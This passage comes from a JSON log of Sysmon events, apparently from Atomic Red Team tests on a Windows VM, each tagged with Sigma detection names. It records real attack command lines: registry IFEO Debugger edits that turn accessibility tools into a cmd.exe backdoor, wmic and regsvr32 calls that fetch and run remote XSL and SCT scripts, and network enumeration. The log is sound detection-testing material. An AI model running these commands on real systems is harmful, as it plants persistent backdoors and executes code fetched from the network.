System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:49:52.011"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3725,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:52.048002Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Sticky Key Like Backdoor Usage"],"event":{"Event":{"EventData":{"Details":"C:\\windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D89A-5D31-0000-0010F56D3200","ProcessId":3704,"RuleName":"Persistence - IFEO Debugger ValueSet","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe\\Debugger","UtcTime":"2019-07-19 14:50:02.212"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3731,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:50:02.220426Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Sticky Key Like Backdoor Usage"],"event":{"Event":{"EventData":{"Details":"C:\\windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D89F-5D31-0000-0010BD7F3200","ProcessId":1860,"RuleName":"Persistence - IFEO Debugger 
ValueSet","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger","UtcTime":"2019-07-19 14:50:07.307"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3735,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:50:07.322063Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Sticky Key Like Backdoor Usage"],"event":{"Event":{"EventData":{"Details":"C:\\windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D8A2-5D31-0000-0010D5913200","ProcessId":2272,"RuleName":"Persistence - IFEO Debugger ValueSet","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\\Debugger","UtcTime":"2019-07-19 14:50:10.275"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3739,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:50:10.295724Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Sticky Key Like Backdoor 
Usage"],"event":{"Event":{"EventData":{"Details":"C:\\windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D8A5-5D31-0000-0010C39D3200","ProcessId":5000,"RuleName":"Persistence - IFEO Debugger ValueSet","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\magnify.exe\\Debugger","UtcTime":"2019-07-19 14:50:13.137"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3743,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:50:13.153167Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Sticky Key Like Backdoor Usage"],"event":{"Event":{"EventData":{"Details":"C:\\windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D8A6-5D31-0000-0010A5A93200","ProcessId":5972,"RuleName":"Persistence - IFEO Debugger ValueSet","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\narrator.exe\\Debugger","UtcTime":"2019-07-19 
14:50:14.697"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3747,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:50:14.716040Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Sticky Key Like Backdoor Usage"],"event":{"Event":{"EventData":{"Details":"C:\\windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D8A9-5D31-0000-0010C0C63200","ProcessId":5124,"RuleName":"Persistence - IFEO Debugger ValueSet","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\DisplaySwitch.exe\\Debugger","UtcTime":"2019-07-19 14:50:17.979"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3751,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:50:17.990891Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"Details":"C:\\windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D8AB-5D31-0000-0010A5D23200","ProcessId":5632,"RuleName":"Persistence - IFEO Debugger 
ValueSet","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\atbroker.exe\\Debugger","UtcTime":"2019-07-19 14:50:19.495"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3755,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:50:19.516948Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["XSL Script Processing"],"event":{"Event":{"EventData":{"CommandLine":"wmic.exe process /FORMAT:list","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"WMI Commandline Utility","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=4004528344D02FD143DAFD94BFE056041B633E0D,MD5=390B2038C9ED2C94AB505921BC827FC7,SHA256=34C4ED50A3441BD7CB6411749771C637A8C18C791525D8FCB5AE71B0B1969BA6,IMPHASH=AF8CD6625FCE3244397EE550EFF4091E","Image":"C:\\Windows\\System32\\wbem\\WMIC.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"wmic.exe process /FORMAT:list\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D8CF-5D31-0000-00109B603300","ParentProcessId":5380,"ProcessGuid":"747F3D96-D8D0-5D31-0000-0010F3623300","ProcessId":7040,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:50:56.021"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3763,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:50:56.047770Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["XSL Script Processing","SquiblyTwo"],"event":{"Event":{"EventData":{"CommandLine":"wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"WMI Commandline Utility","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=4004528344D02FD143DAFD94BFE056041B633E0D,MD5=390B2038C9ED2C94AB505921BC827FC7,SHA256=34C4ED50A3441BD7CB6411749771C637A8C18C791525D8FCB5AE71B0B1969BA6,IMPHASH=AF8CD6625FCE3244397EE550EFF4091E","Image":"C:\\Windows\\System32\\wbem\\WMIC.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D8DA-5D31-0000-0010D3833300","ParentProcessId":5340,"ProcessGuid":"747F3D96-D8DA-5D31-0000-001029863300","ProcessId":3220,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:51:06.748"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3766,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:51:06.753240Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Net.exe Execution","Windows Network Enumeration"],"event":{"Event":{"EventData":{"CommandLine":"net view /domain","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Net Command","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07","Image":"C:\\Windows\\System32\\net.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"net view /domain\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D8DD-5D31-0000-0010EF923300","ParentProcessId":4856,"ProcessGuid":"747F3D96-D8DD-5D31-0000-001043953300","ProcessId":3012,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:51:09.839"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3769,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:51:09.845415Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Net.exe Execution","Windows Network Enumeration"],"event":{"Event":{"EventData":{"CommandLine":"net view","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Net Command","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07","Image":"C:\\Windows\\System32\\net.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"net view\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D8EA-5D31-0000-001030B63300","ParentProcessId":1988,"ProcessGuid":"747F3D96-D8EA-5D31-0000-00108AB83300","ProcessId":4684,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:51:22.330"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3771,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:51:22.333688Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Anomaly","Regsvr32 Flags Anomaly","Regsvr32 Network Activity"],"event":{"Event":{"EventData":{"CommandLine":"regsvr32.exe /s /u /i:C:\\AtomicRedTeam\\atomics\\T1117\\RegSvr32.sct scrobj.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Microsoft(C) Register Server","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F","Image":"C:\\Windows\\System32\\regsvr32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"regsvr32.exe /s /u /i:C:\\AtomicRedTeam\\atomics\\T1117\\RegSvr32.sct scrobj.dll\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D976-5D31-0000-001041E83700","ParentProcessId":4444,"ProcessGuid":"747F3D96-D976-5D31-0000-001093EA3700","ProcessId":2332,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:53:42.834"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4033,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:53:42.841951Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Network Activity"],"event":{"Event":{"EventData":{"Company":"Microsoft Corporation","Description":"Windows ® Script Component Runtime","FileVersion":"5.812.10240.16384","Hashes":"SHA1=5B139E692D2A376CCA16D536612EF87AD946EC6B,MD5=3F4DB17E9534DB1CEDA28FF77C27F535,SHA256=14A2C790E3E82DAF7918B61AB79F84228E7CA4494F5C2D311A1179CCA67B02C2,IMPHASH=C928D4D30D6B6FC0A3B011AA381044CA","Image":"C:\\Windows\\System32\\regsvr32.exe","ImageLoaded":"C:\\Windows\\System32\\scrobj.dll","ProcessGuid":"747F3D96-D976-5D31-0000-001093EA3700","ProcessId":2332,"Product":"Microsoft ® Windows ® Script Component Runtime","RuleName":"","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2019-07-19 14:53:42.961"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":4034,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:53:42.964349Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Command Line Without 
DLL"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\calc.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Calculator","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729","Image":"C:\\Windows\\System32\\calc.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"regsvr32.exe /s /u /i:C:\\AtomicRedTeam\\atomics\\T1117\\RegSvr32.sct scrobj.dll","ParentImage":"C:\\Windows\\System32\\regsvr32.exe","ParentProcessGuid":"747F3D96-D976-5D31-0000-001093EA3700","ParentProcessId":2332,"ProcessGuid":"747F3D96-D977-5D31-0000-00100A0E3800","ProcessId":3848,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:53:43.339"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4035,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:53:43.445040Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Anomaly","Regsvr32 Flags Anomaly","Regsvr32 Network Activity"],"event":{"Event":{"EventData":{"CommandLine":"regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Microsoft(C) 
Register Server","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F","Image":"C:\\Windows\\System32\\regsvr32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D978-5D31-0000-0010442F3800","ParentProcessId":2832,"ProcessGuid":"747F3D96-D978-5D31-0000-0010EB313800","ProcessId":2076,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:53:44.049"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4038,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:53:44.054072Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Network Activity"],"event":{"Event":{"EventData":{"Company":"Microsoft Corporation","Description":"Windows ® Script Component 
Runtime","FileVersion":"5.812.10240.16384","Hashes":"SHA1=5B139E692D2A376CCA16D536612EF87AD946EC6B,MD5=3F4DB17E9534DB1CEDA28FF77C27F535,SHA256=14A2C790E3E82DAF7918B61AB79F84228E7CA4494F5C2D311A1179CCA67B02C2,IMPHASH=C928D4D30D6B6FC0A3B011AA381044CA","Image":"C:\\Windows\\System32\\regsvr32.exe","ImageLoaded":"C:\\Windows\\System32\\scrobj.dll","ProcessGuid":"747F3D96-D978-5D31-0000-0010EB313800","ProcessId":2076,"Product":"Microsoft ® Windows ® Script Component Runtime","RuleName":"","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2019-07-19 14:53:44.103"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":4039,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:53:44.117123Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Command Line Without DLL"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\calc.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Calculator","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729","Image":"C:\\Windows\\System32\\calc.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct 
scrobj.dll","ParentImage":"C:\\Windows\\System32\\regsvr32.exe","ParentProcessGuid":"747F3D96-D978-5D31-0000-0010EB313800","ParentProcessId":2076,"ProcessGuid":"747F3D96-D97A-5D31-0000-00105DA83800","ProcessId":4336,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:53:46.135"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4041,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:53:46.204886Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Anomaly","Regsvr32 Network Activity"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\syswow64\\regsvr32.exe\" /s C:\\AtomicRedTeam\\atomics\\T1117\\bin\\AllTheThingsx86.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Microsoft(C) Register Server","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8","Image":"C:\\Windows\\SysWOW64\\regsvr32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D97A-5D31-0000-00109DDC3800","ProcessId":3564,"Product":"Microsoft® Windows® Operating 
System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:53:46.831"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4044,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:53:46.848703Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Anomaly","Regsvr32 Network Activity"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\regsvr32.exe\" /s C:\\AtomicRedTeam\\atomics\\T1117\\bin\\AllTheThingsx86.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Microsoft(C) Register Server","FileVersion":"10.0.17763.1 